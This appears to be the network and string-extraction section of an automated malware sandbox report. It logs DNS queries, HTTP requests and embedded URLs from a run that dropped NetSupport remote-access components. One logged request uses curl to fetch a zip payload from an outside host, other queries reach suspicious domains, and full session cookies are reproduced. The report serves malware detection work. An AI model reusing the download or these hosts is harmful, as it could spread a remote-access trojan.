Source: global traffic	HTTP traffic detected: GET /rp/lyORKltpug50ELqZ5ptEKcTB5EQ.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rabu.zip??56cfb29adde612865acb HTTP/1.1Host: www.stlchicago.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: NID=524=XQ8vO7qgDY4xZCkZKIhi0FxhO55QtBLxj9sncjQzjvGtkq2ctgvOkBEr7js2tfxiGwyhzXutM7TTtZ1gHYSaOr_ptYNJD3PF9enrgoA0nh7uvKFGXGqrHWwG3ZrsND9Y_eil2DFr6TbANtaSoH_1ig89fqmYO5cy1QuPnXzwMKUXuVr4UUTDRGZFADFHmHeNI-nYFVQpriority: u=4, i

Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: .www.youtube.com_KEY equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: =https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2297972034.0000742401714000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: _keyhttps://www.youtube.com/s/player/3b4b7883/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2420598347.0000742401C63000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/cspreport equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/cspreportframe equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX$ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR34"7 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlmin.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.css equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.csseHandleror equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: tTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState\|\|d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2624436825.0000742402092000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2257928889.0000742402CE7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1694261859.0000742402578000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2624436825.0000742402092000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2421538935.0000742401ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2418860091.00007424016CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com@x equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comtTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState\|\|d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: fountainofhealth.ca
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: 3dmaine.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global traffic	DNS traffic detected: DNS query: i.ytimg.com
Source: global traffic	DNS traffic detected: DNS query: kingdomholding.top
Source: global traffic	DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: static.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: yt3.ggpht.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.stlchicago.com
Source: global traffic	DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: e2c12.gcp.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons2.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons3.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons4.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons5.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons5.gvt3.com

Source: unknown

HTTP traffic detected: POST /youtubei/v1/log_event?alt=json HTTP/1.1host: www.youtube.comcontent-length: 12121sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0x-youtube-client-name: 56x-youtube-ad-signals: dt=1748893175463&flash=0&frm=2&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&bc=31&bih=-12245933&biw=-12245933&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C850%2C480&vis=1&wgl=true&ca_type=imagex-goog-event-time: 1748893179530x-youtube-client-version: 1.20250528.22.00content-type: application/jsonx-youtube-page-label: youtube.player.web_20250528_22_RC00x-youtube-page-cl: 764512846x-youtube-utc-offset: -240x-youtube-device: cbr=Chrome&cbrver=134.0.0.0&ceng=WebKit&cengver=537.36&cos=Windows&cosver=10.0&cplatform=DESKTOPx-goog-visitor-id: CgtDX2FnWUQxOTVQQSj4-_fBBjIKCgJVUxIEGgAgOg%3D%3Dx-goog-request-time: 1748893179530user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36x-youtube-time-zone: America/New_Yorkaccept: */*origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __

Source: PCICL32.DLL.31.dr	String found in binary or memory: http://127.0.0.1
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: hw.dll.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000083AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: hw.dll.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: hw.dll.31.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: hw.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000083AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: hw.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: hw.dll.31.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: hw.dll.31.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pa
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhobagln
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmifoiba
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookg
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbj
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbog
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://epscd.catcert.net/crl/ec-acc.crl0.
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://epscd2.catcert.net/crl/ec-acc.crl0
Source: chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://fountainofhealth.ca/
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856165285.0000742401CC3000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422598110.0000742401CCC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://jquery.org/license
Source: chrome.exe, 00000000.00000003.1694261859.0000742402578000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://jqueryui.com
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://ocsp.catcert.cat0
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000083AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp, pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: adtw.dll1.31.dr, hw.dll.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: hw.dll.31.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000014.00000000.1337084127.0000000008354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.0000000008374000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: hw.dll.31.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://s2.symcb.com0
Source: explorer.exe, 00000014.00000000.1329943695.00000000071E0000.00000002.00000001.00040000.00000009.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000014.00000000.1345005602.000000000BFF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micros/H
Source: client32.exe.31.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: client32.exe.31.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: client32.exe.31.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: client32.exe.31.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: hw.dll.31.dr	String found in binary or memory: http://support.steampowered.com
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://sv.symcd.com0&
Source: hw.dll.31.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hw.dll.31.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hw.dll.31.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000014.00000000.1345005602.000000000BE90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1587698138.000000000BEBD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://www.catcert.cat/descarrega/acc.crt0#
Source: hw.dll.31.dr	String found in binary or memory: http://www.counter-strike.net/cheat.html
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thir
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhob
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmif
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbjhghbfimg
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: explorer.exe, 00000014.00000003.1587698138.000000000BF28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2020018194.000000000BF28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000014.00000000.1343526292.000000000B9EF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppsf
